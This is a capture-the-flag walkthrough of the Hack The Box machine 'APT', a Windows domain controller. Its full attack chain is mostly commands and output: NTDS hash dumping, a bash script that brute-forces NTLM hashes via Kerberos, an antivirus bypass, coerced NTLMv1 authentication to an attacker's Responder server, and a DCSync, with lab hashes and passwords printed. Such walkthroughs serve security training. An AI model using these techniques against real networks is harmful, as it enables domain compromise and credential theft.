APT
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.213 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Wed Apr 12 20:59:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
# Nmap done at Wed Apr 12 21:00:08 2023 -- 1 IP address (1 host up) scanned in 26.45 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 12 19:17:32 2023 as: nmap -sCV -p80,135 -Pn -n -oN targeted 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 19:17:47 2023 -- 1 IP address (1 host up) scanned in 14.76 secondsThe website on port 80 shows a hosting site named Gigantic Hosting. Nothing is interesting on the website.
As port 135 is also open, we could try to identify the IP addresses of the machines. We'll have to do it with the IOXIDResolver tool.
python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::91b0:8f12:89f1:15ce
Address: dead:beef::e8The machine has a few IPv6 addresses. Let's add the first one to the /etc/hosts file and assign the apt name to the IPv6 address.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f aptNow that we have the IPv6 address of the machine, we could try to run the nmap scan, but this time through IPv6.
nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 apt
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.-6use IPv6 address.
# Nmap 7.93 scan initiated Wed Apr 12 21:00:16 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for apt
Host is up (0.036s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49698/tcp open unknown
64885/tcp open unknown
# Nmap done at Wed Apr 12 21:00:43 2023 -- 1 IP address (1 host up) scanned in 26.41 secondsThere are way more ports exposed through IPv6 than IPv4. Let's get their services and versions.
nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 apt
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.-6use IPv6 address.
# Nmap 7.93 scan initiated Wed Apr 12 22:12:17 2023 as: nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-12 20:12:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49688/tcp filtered unknown
49885/tcp filtered unknown
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2023-04-12T21:13:17+01:00
|_clock-skew: mean: -8m33s, deviation: 22m39s, median: 0s
| smb2-time:
| date: 2023-04-12T20:13:15
|_ start_date: 2023-04-12T17:09:56
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 22:13:25 2023 -- 1 IP address (1 host up) scanned in 67.49 secondsThis looks like a domain controller. Nmap got the domain name htb.local. Let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f apt htb.localLet's enumerate the SMB shares of the DC.
smbclient -L apt -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
apt is an IPv6 address -- no workgroup availableAs seen below, the backup share has one file called backup.zip. Let's transfer it to our local machine.
smbclient //apt/backup -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 07:30:52 2020
.. D 0 Thu Sep 24 07:30:52 2020
backup.zip A 10650961 Thu Sep 24 07:30:32 2020
5114623 blocks of size 4096. 2632003 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2027.5 KiloBytes/sec) (average 2027.5 KiloBytes/sec)If we try to unzip it, we'll see it is protected with a password.
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:Let's use zip2john and john to get the password.
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2023-04-14 09:02) 14.28g/s 117028p/s 117028c/s 117028C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now, unzip the file, and we'll see
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password: iloveyousomuch
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
creating: registry/
inflating: registry/SECURITY
inflating: registry/SYSTEMThe compressed file contains the ntds.dit and SYSTEM file. With these two files we could try to dump the NTDS hashes using secretsdump.
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::
...
[*] Cleaning up...As we can see, there are a lot of users and hashes. Let's put the users in the users file, and the NTLM hashes in the ntlm file.
cat ntds_dump.ntds | awk '{print $1}' FS=":" > users
cat ntds_dump.ntds | awk '{print $4}' FS=":" > ntlm
Exploitation
Now that we have a list of users, we'll need to find which of these users are valid. We can do it with the kerbrute tool.
kerbrute_linux_amd64 userenum --dc apt -d htb.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/14/23 - Ronnie Flathers @ropnop
2023/04/14 09:28:20 > Using KDC(s):
2023/04/14 09:28:20 > apt:88
2023/04/14 09:28:26 > [+] VALID USERNAME: APT$@htb.local
2023/04/14 09:28:26 > [+] VALID USERNAME: Administrator@htb.local
2023/04/14 09:32:16 > [+] VALID USERNAME: henry.vinson@htb.local
2023/04/14 09:45:23 > Done! Tested 2000 usernames (3 valid) in 1022.331 secondsIt found that the henry.vinson user is a valid user. As we have a valid user, and a list of NTLM hashes, we could try to brute force his NTLM by trying each has of the list. The problem is that if we try to do it through SMB we'll get banned.
crackmapexec smb apt -u 'henry.vinson' -H ntlm
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [-] htb.local\henry.vinson:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
...
SMB apt 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.It seems that the server is banning any attempt of brute force through SMB, but it doesn't through Kerberos, because we were able to test which users were valid. So we need to brute force the NTLM hash through Kerberos. I made the following bash script which tries to obtain a TGT for the henry.vinson user with each NTLM hash from the ntlm file. It uses the getTGT tool from impacket, and you can also set threads to make it faster.
#!/bin/bash
dc='apt'
username='henry.vinson'
domain='htb.local'
hash_list='/home/alfa8sa/HTB/machines/apt/ntlm'
threads=100
PROGRESS_BAR_WIDTH=25
draw_progress_bar() {
local __value=$1
local __max=$2
local __unit=${3:-""}
if (( $__max < 1 )); then __max=1; fi
local __percentage=$(( 100 - ($__max*100 - $__value*100) / $__max ))
local __num_bar=$(( $__percentage * $PROGRESS_BAR_WIDTH / 100 ))
printf "["
for b in $(seq 1 $__num_bar); do printf "#"; done
for s in $(seq 1 $(( $PROGRESS_BAR_WIDTH - $__num_bar ))); do printf " "; done
printf "] $__percentage%% ($__value / $__max $__unit)\r"
}
lines=$(wc -l $hash_list | awk '{print $1}')
counter=1
div=$(($lines/$threads+1))
for line in $(seq 1 $div); do
margin=$(expr $counter + $threads - 1)
regex=$(echo $counter,$margin"p")
hashes=$(sed -n $regex < $hash_list)
draw_progress_bar $(expr $counter - 1) $lines "hashes"
for hash in $hashes; do
impacket-getTGT $dc/$username@$domain -hashes :$hash | grep -q "ticket" && echo $hash > .hash &
done;wait
if [ -f ".hash" ]; then
echo ""
echo "Valid NTLM hash: " $(cat .hash)
rm -rf .hash
exit 0
fi
counter=$(($counter+$threads))
done
rm -rf .hashRun the script to get the valid NTLM hash for henry.vinson.
bash bruteforcer.sh
[################# ] 70% (1400 / 2000 hashes)
Valid NTLM hash: e53d87d42adaa3ca32bdb34a876cbffbConfirm that the hash is valid.
crackmapexec smb apt -u 'henry.vinson' -H e53d87d42adaa3ca32bdb34a876cbffb
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffbThere is one tool from impacket called reg.py, which allows to query registers remotely such us HKCR, HKCU, HKLM, HKU, or HKCC using valid credentials. We could see the content of the HKU registry.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU
HKU\Console
HKU\Control Panel
HKU\Environment
HKU\Keyboard Layout
HKU\Network
HKU\Software
HKU\System
HKU\Volatile EnvironmentInside HKU\Software we'll see the GiganticHostingManagementSystem register.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\ClassesThis registry might have something interesting because is named similar as the website we saw earlier.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software\\GiganticHostingManagementSystem"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvhtLet's verify the found credentials.
crackmapexec smb apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht They are valid, and this user seems to be a member of the Remote Management Users group because we can get a shell via WinRM and then grab the user flag.
evil-winrm -i apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type \users\henry.vinson_adm\desktop\user.txt
cfafacdccf12c0e1a3965551ba302274Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
upload /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
If we try to run the binary, we'll see that Windows Defender is blocking the binary.
.\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedFortunately for us, evil-winrm has a feature to bypass the antivirus. This way the binary will be loaded and executed in memory.
Bypass-4MSI
Invoke-Binary /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
...
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
[!] NTLM clients support NTLMv1!
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
[!] NTLM services on this machine support NTLMv1!
...It found that NTLM services and clients on the domain controller support NTLMv1. This is a problem because NTLMv1 uses a weak authentication which can be broken. The idea is to set a fake SMB server with responder, and capture the NTLMv1 hash of the machine, which can then be cracked with crack.sh. First, modify the responder configuration file.
nano /etc/responder/Responder.conf
...
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
...Then, launch responder downgrading to LM.
responder -I tun0 --lm
-Inetwork interface to use.--lmforce LM hashing downgrade.
Now we need to make the victim machine authenticate against our fake SMB server. As we know that Windows Defender is available, we can use the MpCmdRun.exe binary to load a random file from our fake SMB server.
cd "Program Files\Windows Defender"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.14\random
[+] Listening for events...
[SMB] NTLMv1 Client : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788Now go to the GET CRACKING page and submit the hash.
You should receive an email with the NTLM hash for the machine account of the domain controller.
With this hash we can dump the real NTDS of the domain controller.
impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...Now that we have the real NTLM hash of the administrator user, we can get a shell as him, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i apt -u 'administrator' -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
9b4ea0031ea51d07dd67270520495d46Last updated
Was this helpful?